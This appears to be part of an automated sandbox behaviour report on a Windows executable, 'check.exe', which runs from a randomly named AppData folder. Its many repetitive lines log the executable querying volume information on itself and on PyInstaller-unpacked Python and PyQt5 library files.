Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\sip.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
